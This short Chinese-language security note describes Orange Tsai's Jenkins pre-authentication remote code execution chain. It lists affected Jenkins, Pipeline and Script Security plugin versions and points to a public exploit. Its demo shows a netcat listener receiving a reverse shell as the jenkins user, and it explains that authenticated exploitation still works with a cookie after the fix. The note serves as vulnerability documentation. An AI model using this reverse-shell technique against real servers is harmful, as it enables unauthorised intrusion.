参考资料：

• https://www.exploit-db.com/exploits/46453
• http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html

本文涵盖Orange Tsai发现的Jenkins预认证漏洞利用

受影响版本： Jenkins < 2.137（预认证）

受影响插件：

• Pipeline: Declarative Plugin 至1.3.4及以下版本
• Pipeline: Groovy Plugin 至2.61及以下版本
• Script Security Plugin 至1.49及以下版本（在CG的测试中1.50版本也存在漏洞）

上述exploitdb链接提供了一个完整的独立漏洞利用程序，可编译jar文件并通过易受攻击的Jenkins服务器进行检索。

利用演示：

1
2
3
4
5

nc -l 8888 -vv

whoami
bash: no job control in this shell
bash-3.2$ jenkins

在Jenkins 2.138之后，预认证漏洞已被修复，但如果拥有全局读取令牌且插件仍存在漏洞，仍可继续利用该服务器。只需在脚本中添加cookie，即可通过认证cookie访问URL并继续利用服务器。